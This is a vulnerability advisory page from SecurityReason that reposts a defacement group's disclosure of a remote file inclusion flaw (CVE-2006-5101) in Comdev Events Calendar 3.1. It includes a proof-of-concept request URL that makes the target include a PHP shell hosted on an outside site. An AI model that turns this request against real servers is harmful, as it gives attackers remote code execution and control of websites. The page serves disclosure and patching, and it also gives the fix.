|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 1658 CVE : CVE-2006-5101 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : rUnViRuS Published : 03.10.2006
Advisory Content : +-------------------------------------------------------------------- + + Comdev Events Calendar 3.1 :) <= Remote File Inclusion + +-------------------------------------------------------------------- + + Affected Software .: Comdev Events Calendar 3.1 + Venedor ...........: http://www.comdevweb.com + Class .............: Remote File Inclusion + Risk ..............: high (Remote File Execution) + Found by ..........: rUnViRuS + Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/ + Contact ...........: stormhacker[at]hotmail[.]com + +-------------------------------------------------------------------- + + Code include.php: + + ..... + include($path["docroot"]."common/wce.login.php"); + ..... + +-------------------------------------------------------------------- + + $path["docroot"] is not properly sanitized before being used. + The bug is in the "Comdev CSV Importer" Package for Comdev CSV Importer. + +-------------------------------------------------------------------- + + Solution: + Add this line to your php-file: + + $path["docroot"] ="user/dir" //Your root path + +-------------------------------------------------------------------- + PoC: + Place a PHPShell on a remote location: + http://wdzone.net/sh.txt? + + + http://[target]/include.php?path["docroot"]=http://phpshell + +-------------------------------------------------------------------- + [W]orld [D]efacers [T]eam + Greets: + || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BLaCKWHITE || + || Pro Hacker || + +-------------------------[ W D T ]----------------------------------  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |